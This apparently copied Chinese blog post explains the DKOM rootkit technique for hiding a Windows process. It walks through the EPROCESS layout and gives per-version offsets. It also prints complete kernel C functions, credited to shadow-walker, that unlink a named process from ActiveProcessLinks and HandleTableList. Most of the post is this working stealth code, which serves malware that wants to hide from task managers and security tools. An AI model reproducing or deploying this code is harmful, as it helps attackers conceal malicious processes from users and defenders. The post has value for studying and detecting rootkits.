• 修改ActiveProcessLinks链表隐藏进程

    在Windows内核中有一个活动进程链表AcvtivePeorecssList。它是一个双向链表,保存着系统中所有进程的EPROCESS结构。特别地,进程的EPROCESS结构包含一个具有指针成员FLINK和BLINK的LIST_ENTRY结构,这两个指针分别指向当前进程的前方和后方进程。当某些模块需要获得系统中运行的所有进程信息时,就会遍历这个链表。若在PsActviePoroessList链表上删除了某个进程对象,该进程将被隐藏起来。
    EPROCESS的结构可参考http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html。windbg中查看如下:
    0:000> dt _EPROCESS
       +0x000 Pcb              : _KPROCESS
       +0x06c ProcessLock      : _EX_PUSH_LOCK
       +0x070 CreateTime       : _LARGE_INTEGER
       +0x078 ExitTime         : _LARGE_INTEGER
       +0x080 RundownProtect   : _EX_RUNDOWN_REF
       +0x084 UniqueProcessId  : Ptr32 Void
       +0x088 ActiveProcessLinks : _LIST_ENTRY
       +0x090 QuotaUsage       : [3] Uint4B
       +0x09c QuotaPeak        : [3] Uint4B
       +0x0a8 CommitCharge     : Uint4B
       +0x0ac PeakVirtualSize  : Uint4B
       +0x0b0 VirtualSize      : Uint4B
       +0x0b4 SessionProcessLinks : _LIST_ENTRY
       +0x0bc DebugPort        : Ptr32 Void
       +0x0c0 ExceptionPort    : Ptr32 Void
       +0x0c4 ObjectTable      : Ptr32 _HANDLE_TABLE
       ......
       也就是说每次得到一个ActiveProcessLinks地址,再减去它离EPROCESS结构入口处的偏移,就可以得到EPROCESS的地址,然后就可以轻松得到想要的EPROCESS的任何成员变量!不同的操作系统ActiveProcessLinks的偏移有所不同。
      要想隐藏某个进程,将其从ActiveProcessLinks链表中摘掉并修改前后结点的指向即可,同时修改HandleTableList的指向。shadow-walker上就对HandleTableList链表也进行了修改。_HANDLE_TABLE、HandleTableList在不同操作系统中在EPROCESS中便宜也不同。可以通过PsGetVersion获取系统版本并赋值。具体值可以在windbg中查看。
     ULONG majorVersion;
     ULONG minorVersion;
     // Get the operating system version
     PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );
     if (majorVersion == 4 && minorVersion == 0)
     {
      //DbgPrint("Stop supporting NT 4.0");
      return STATUS_UNSUCCESSFUL;
     }
     else if (majorVersion == 5 && minorVersion == 0)
     {
      //DbgPrint("Microsoft Windows 2000 ");
      *pd_flink = 160;
      *pd_tableoff = 0x128;
      *pd_tablelist = 0x54;
     }
     else if (majorVersion == 5 && minorVersion == 1)
     {
      //DbgPrint("Microsoft Windows XP ");
      *pd_flink = 136;
      *pd_tableoff = 0xc4;
      *pd_tablelist = 0x1c;
     }
     else if (majorVersion == 5 && minorVersion == 2)
     {
      //DbgPrint("Microsoft Windows Server 2003 ");
      *pd_flink = 136;
      *pd_tableoff = 0xc4;//
      *pd_tablelist = 0x1c; //
     }
    这种隐藏进程的方法貌似就叫DKOM法,具体原理上个图看看:

    图中,正常的连接情况如黑线箭头所示,若要摘除某个结点,修改该结点前后两个结点的指针即可,修改示意如红线所示!代码都是shadow-walker中的,如下
    void HideEPROCESSByPrefix(char *p_name, DWORD d_procName, DWORD d_flinkOffset, DWORD d_tableOffset, DWORD d_tableList)
    {
     int   len         = 0;
     PLIST_ENTRY plist_active_procs;
     DWORD curr_eproc, eproc;

     
     if (p_name == NULL)
      return;

     len = strlen(p_name);

     eproc = (DWORD) PsGetCurrentProcess();
     curr_eproc = eproc;

     do
     {
      plist_active_procs = (LIST_ENTRY *) (curr_eproc+d_flinkOffset);//get the first ActiveProcessLinks

      if(_strnicmp(p_name, (PVOID)(curr_eproc+d_procName) ,len) == 0) //cmp the procname if equal hideproc name
      {
       // just Change neighbors
       *((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
       *((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;

       UnHookHandleListEntry((PEPROCESS)curr_eproc, d_tableOffset, d_tableList);

       // Advance
       curr_eproc = (DWORD) plist_active_procs->Flink;//pointer next ActiveProcessLinks
       curr_eproc = curr_eproc - d_flinkOffset;//ActiveProcessLinks -offset=next _EPROCESS

       // Point to ourselves
       plist_active_procs->Flink = (LIST_ENTRY *) &(plist_active_procs->Flink); // Change the current EPROCESS
       plist_active_procs->Blink = (LIST_ENTRY *) &(plist_active_procs->Flink); // so we don't point to crap
      }
      else
      {
       curr_eproc = (DWORD) plist_active_procs->Flink;  //pointer next ActiveProcessLinks
       curr_eproc = curr_eproc - d_flinkOffset;//ActiveProcessLinks -offset=next _EPROCESS
      }
     } while(eproc != curr_eproc);  //
    }


    void UnHookHandleListEntry(PEPROCESS eproc, DWORD d_handleTable, DWORD d_handleList)
    {
     PLIST_ENTRY plist_hTable = NULL;
     plist_hTable = (PLIST_ENTRY)((*(PDWORD)((DWORD) eproc + d_handleTable)) + d_handleList);

     // Change neighbors because they point fingers
     *((DWORD *)plist_hTable->Blink) = (DWORD) plist_hTable->Flink;
     *((DWORD *)plist_hTable->Flink+1) = (DWORD) plist_hTable->Blink;

     plist_hTable->Flink = (LIST_ENTRY *) &(plist_hTable->Flink); // Change the current LIST_ENTRY
     plist_hTable->Blink = (LIST_ENTRY *) &(plist_hTable->Flink); // so we don't point to crap

    }
  • 相关阅读:
    二叉苹果树|codevs5565|luoguP2015|树形DP|Elena
    没有上司的舞会|codevs1380|luoguP1352|树形DP|Elena
    NYOJ15|括号匹配(二)|区间DP|Elena
    AtCoder Beginner Contest 070|Elena|8.12|#471
    NYOJ16|嵌套矩形|DP|DAG模型|记忆化搜索
    7.26-STOIRegularMatch-08-#14
    跳石头|河中跳房子|NOIP2015提高组T4|二分法
    BZOJ2330: [SCOI2011]糖果
    BZOJ1295: [SCOI2009]最长距离
    BZOJ1263: [SCOI2006]整数划分
  • 原文地址:https://www.cnblogs.com/vcerror/p/4289090.html
Copyright © 2020-2023  润新知